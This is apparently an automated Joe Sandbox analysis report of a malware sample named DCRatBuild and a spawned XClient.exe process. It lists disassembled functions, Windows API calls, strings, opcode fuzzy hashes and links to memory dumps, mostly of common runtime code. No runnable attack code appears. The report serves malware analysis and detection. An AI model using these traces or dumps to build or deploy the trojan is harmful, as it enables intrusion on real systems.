Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 7a665dc0e62381c6ccde80a756d6449ccb12d019d933277eaa2f5a0fe86104e6
Instruction ID: 60f68267b08a51866f2dc5c64fcf8a923eb5f2dc17c2415b5f847d0dc28b35c5
Opcode Fuzzy Hash: 7a665dc0e62381c6ccde80a756d6449ccb12d019d933277eaa2f5a0fe86104e6
Instruction Fuzzy Hash: 3941F0302483849ED739DF24CC45BAEBBE9FB81700F244A1EB5D0D3280C7A49A48DB53

Function 008FC099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008F89AD,?,00000000,?,00000001,?,?,00000001,008F89AD,?), ref: 008FC0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008FC16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008F67E2,?), ref: 008FC181
__freea.LIBCMT ref: 008FC18A

Part of subcall function 008F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008FC13D,00000000,?,008F67E2,?,00000008,?,008F89AD,?,?,?), ref: 008F854A

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 078ae94a48fce10cd9b37ae0c365a8791f3281fe23796db20cf8960189a83ed7
Instruction ID: 718d57a0c92f56142ec0fd04d24441fd9f5314692dc12fa50afcbfe8931f8b13
Opcode Fuzzy Hash: 078ae94a48fce10cd9b37ae0c365a8791f3281fe23796db20cf8960189a83ed7
Instruction Fuzzy Hash: AD31BD72A1021EABDB248F79DC41DBE7BA9FB44710F144128FD04D6291EB35CEA0CBA0

Function 008F2503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 008F251A

Part of subcall function 008F2B52: ___AdjustPointer.LIBCMT ref: 008F2B9C

_UnwindNestedFrames.LIBCMT ref: 008F2531
___FrameUnwindToState.LIBVCRUNTIME ref: 008F2543
CallCatchBlock.LIBVCRUNTIME ref: 008F2567

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 32be65a879a8bca8522c50a774c50e8931f854401530ad06c7962d59bfe88381
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: E201173200010CBBCF129F69CC11EEA3BBAFF59714F158014FE18A6121C336E961EBA1

Function 008E9DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008E9DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 008E9DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008E9DDB
ReleaseDC.USER32(00000000,00000000), ref: 008E9DE9

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: c2d556497a490b49f9788243caa9973bd9e35e61121ea32fccf51aada299811e
Instruction ID: 4db97b48e3dd016f438005972afe9ca19ca1363808c306c06329eb83b998b1d0
Opcode Fuzzy Hash: c2d556497a490b49f9788243caa9973bd9e35e61121ea32fccf51aada299811e
Instruction Fuzzy Hash: D3E0EC31AAD621A7D3241BA5BC0DB8B3B55EB09712F054005F605961E0DA704449EF94

Function 008F2016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 008F2016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 008F201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 008F2020

Part of subcall function 008F310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 008F311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 008F2035

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: 6022b8315d043b20b473f3763844052ac6b69f390ab3875750268a405785b26e
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: 32C04C26005A4CE41C113ABE71031BE2740FCB37C4B9220C2FB80D7243DE060A5AA07B

Function 008E9F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 008E9DF1: GetDC.USER32(00000000), ref: 008E9DF5
Part of subcall function 008E9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 008E9E00
Part of subcall function 008E9DF1: ReleaseDC.USER32(00000000,00000000), ref: 008E9E0B

GetObjectW.GDI32(?,00000018,?), ref: 008E9F8D

Part of subcall function 008EA1E5: GetDC.USER32(00000000), ref: 008EA1EE
Part of subcall function 008EA1E5: GetObjectW.GDI32(?,00000018,?), ref: 008EA21D
Part of subcall function 008EA1E5: ReleaseDC.USER32(00000000,?), ref: 008EA2B5

Strings

(, xrefs: 008EA0A3

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 630eef70a8e63539581618333426753e506252d643a026c41d397c8fda4185ea
Instruction ID: 4437144addd64e1d7596589ac262ba55678c906a82a7209624d86fb45b508636
Opcode Fuzzy Hash: 630eef70a8e63539581618333426753e506252d643a026c41d397c8fda4185ea
Instruction Fuzzy Hash: 0C812171218754AFC714DF69C844A2ABBE9FFC9B04F00891DF99AD7260CB31AD05DB62

Function 008E0E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 008E0FF1

Strings

%ls, xrefs: 008E0E76, 008E0E8C
%s: %s, xrefs: 008E1000

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: be12c5bf10ee410c84ab8094f367b4a3a43a2fb45182838760e88e425fc9054e
Instruction ID: 616900fd773d8987ed741c50acdf36f745e19e2b1aadd203007f0d917a75bb32
Opcode Fuzzy Hash: be12c5bf10ee410c84ab8094f367b4a3a43a2fb45182838760e88e425fc9054e
Instruction Fuzzy Hash: 2551B33124C7C9FAEE211AEACD46F267665F706B04F204D16F79AF44D1CAF294E06A03

Function 008D772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D7730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008D78CC

Part of subcall function 008DA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008DA27A,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA458
Part of subcall function 008DA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008DA27A,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA489

Strings

:, xrefs: 008D77A1

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 9a911b607d96bea85ebc77a4cf57a18e6bb6a1c1efba3a654ac58734a1fc50b9
Instruction ID: 5a5f8e2cfd3044cfa9c639fcd7ccb247efdc783da1b2e46cd35caf72b1cfeea5
Opcode Fuzzy Hash: 9a911b607d96bea85ebc77a4cf57a18e6bb6a1c1efba3a654ac58734a1fc50b9
Instruction Fuzzy Hash: EE418471805258AADB24EB54DD45EEEB37CFF45300F0042ABB649E2292EB745F84DF62

Function 008DB66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

\\?\, xrefs: 008DB6BE, 008DB6FA, 008DB75B, 008DB7AE
UNC, xrefs: 008DB708

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: fc059c1321505fc4e23ef2cdf4ed4734bb39d001e8749b5e7a786c2194c065e9
Instruction ID: b04277af76edf1b6765d6fd5a09ce18e21a7be9e437e634b4fd046cd806abd24
Opcode Fuzzy Hash: fc059c1321505fc4e23ef2cdf4ed4734bb39d001e8749b5e7a786c2194c065e9
Instruction Fuzzy Hash: E141BC3584025DEBCB20AF25CC41EAB77ADFF84390B128267F915E7352EB30DA40DA61

Function 008E8FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 008E8FC4

Strings

Shell.Explorer, xrefs: 008E8FEF
about:blank, xrefs: 008E9082

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: a34d211ab9525d88f4b28975a97b8dfad6268ebbf2c5008d0845da2fdb7772f3
Instruction ID: acf93ca2acacdb09ea61c7adafe76c1dff8f2b7a752ce52ed210c9cc98b0a570
Opcode Fuzzy Hash: a34d211ab9525d88f4b28975a97b8dfad6268ebbf2c5008d0845da2fdb7772f3
Instruction Fuzzy Hash: 9321E4712143949FCB18AF29C895A2A77A8FF86710B04C06DF849CF282DFB0EC00CB61

Function 008DEBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 008DEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 008DEB92
Part of subcall function 008DEB73: GetProcAddress.KERNEL32(009181C0,CryptUnprotectMemory), ref: 008DEBA2

GetCurrentProcessId.KERNEL32(?,?,?,008DEBEC), ref: 008DEC84

Strings

CryptUnprotectMemory failed, xrefs: 008DEC7C
CryptProtectMemory failed, xrefs: 008DEC3B

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: beeb2cd183f20a491eee105a22fd7194cdac08cc247d21d3380d695e63713d61
Instruction ID: 71d4e6c5beeafb764e7b37014f281df943c7daac98c89bb6bb625eb8614c8b71
Opcode Fuzzy Hash: beeb2cd183f20a491eee105a22fd7194cdac08cc247d21d3380d695e63713d61
Instruction Fuzzy Hash: AF113A32A38218AFDB256B25DC466AE3758FF44724B048217FC15EF381CB756D4197D1

Function 008E0889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,008E09D0,?,00000000,00000000), ref: 008E08AD
SetThreadPriority.KERNEL32(?,00000000), ref: 008E08F4

Part of subcall function 008D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D6EAF

Strings

CreateThread failed, xrefs: 008E08B9

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 90c8bd4283a7117b0daf76e5759f1d4a3be89a9f999a46d4927d80da79d243cc
Instruction ID: a0e078bb2f997b3274f2a076d29e8bd7b355d7a0a56e8dfdbf07100cd004c7ac
Opcode Fuzzy Hash: 90c8bd4283a7117b0daf76e5759f1d4a3be89a9f999a46d4927d80da79d243cc
Instruction Fuzzy Hash: 1D01FEB13443096FD6306F65EC42FA67398FB85715F20053EF646D2281CEF168C19A64

Function 008D130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 008DDA98: _swprintf.LIBCMT ref: 008DDABE
Part of subcall function 008DDA98: _strlen.LIBCMT ref: 008DDADF
Part of subcall function 008DDA98: SetDlgItemTextW.USER32(?,0090E154,?), ref: 008DDB3F
Part of subcall function 008DDA98: GetWindowRect.USER32(?,?), ref: 008DDB79
Part of subcall function 008DDA98: GetClientRect.USER32(?,?), ref: 008DDB85

GetDlgItem.USER32(00000000,00003021), ref: 008D134F
SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365

Strings

0, xrefs: 008D130E

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 1f3feaa888bdcf1b60fe17452622d90f5c5bf5af058eb5c90f7a919850b42c04
Instruction ID: 231720df659df91b569d6dfc09105ae7674eea1bb38da9f51df73fe1c8c87b80
Opcode Fuzzy Hash: 1f3feaa888bdcf1b60fe17452622d90f5c5bf5af058eb5c90f7a919850b42c04
Instruction Fuzzy Hash: 6AF08C3010838CBADF290F618D0DBE93B98FF50309F088216FD4994BA1C779C995EA10

Function 008E084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,008E0A78,?), ref: 008E0854
GetLastError.KERNEL32(?), ref: 008E0860

Part of subcall function 008D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D6EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 008E0869

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 218ca59c4f4c4428276e5c6066f8df2a697e18eb83895083b92fb4acaa8e96fb
Instruction ID: ade9c3b0cf7f10dcecaa5cb363a348040a3e3a7e68151bc7edfc06b1e0a5044f
Opcode Fuzzy Hash: 218ca59c4f4c4428276e5c6066f8df2a697e18eb83895083b92fb4acaa8e96fb
Instruction Fuzzy Hash: 51D02B31A0C0307AC6102328AC0ADAF3B18EF82330F604716F238D52F0DB21099151D2

Function 008DDA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,008DD32F,?), ref: 008DDA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,008DD32F,?), ref: 008DDA61

Strings

RTL, xrefs: 008DDA5B

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: fd43563744b38c542a71ff6dba1fc75a7388a1975092af808e362097fd66e297
Instruction ID: 33aef95128ee09e64223ce7ad90fd94169f0920f17e659bf1b6a2e5ddeabc391
Opcode Fuzzy Hash: fd43563744b38c542a71ff6dba1fc75a7388a1975092af808e362097fd66e297
Instruction Fuzzy Hash: EEC0123229B750BAD73017216C0DB432A5C6B10B11F05454DB181DA1D0D5E5C9449650

Analysis Process: XClient.exePID: 7204, Parent PID: 4900COMMON

Executed Functions

Function 00007FFD9B7C05A0 Relevance: 2.0, Strings: 1, Instructions: 710COMMON

Download Yara Rule

Strings

SAP_^, xrefs: 00007FFD9B7C0FB1

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID: SAP_^
API String ID: 0-3471593181
Opcode ID: f9d424f599522f1f98acd38728bc6e5dde4869b6c1ee67d129358089e508cec1
Instruction ID: 7f5f7af81a4749242364211840d3d09148aa1d6ea3502bd0d96079f3f3949bfd
Opcode Fuzzy Hash: f9d424f599522f1f98acd38728bc6e5dde4869b6c1ee67d129358089e508cec1
Instruction Fuzzy Hash: 1C22D621B19A4D1BE7A8FB788479ABD77D1EF98300F4505BDE04DC33E6DE28A9418781

Function 00007FFD9B7C6406 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c20d34d4e8a4b64d2b078747ecb60af72f7f88aae4b6ac176a763636d5507b3b
Instruction ID: 2b3b69d618bffc9d78a24a6b49effc2389738c5878850fdbf0a47b4e39847110
Opcode Fuzzy Hash: c20d34d4e8a4b64d2b078747ecb60af72f7f88aae4b6ac176a763636d5507b3b
Instruction Fuzzy Hash: 37F19130A09A8D8FEBA8EF28D8557F937D1FB64310F14426EE84DC72A5DB34D9458B81

Function 00007FFD9B7C71B2 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 086a66a3ec0ce7e8e5f9421b540f914416bec21fb1518035ede92051e95858d3
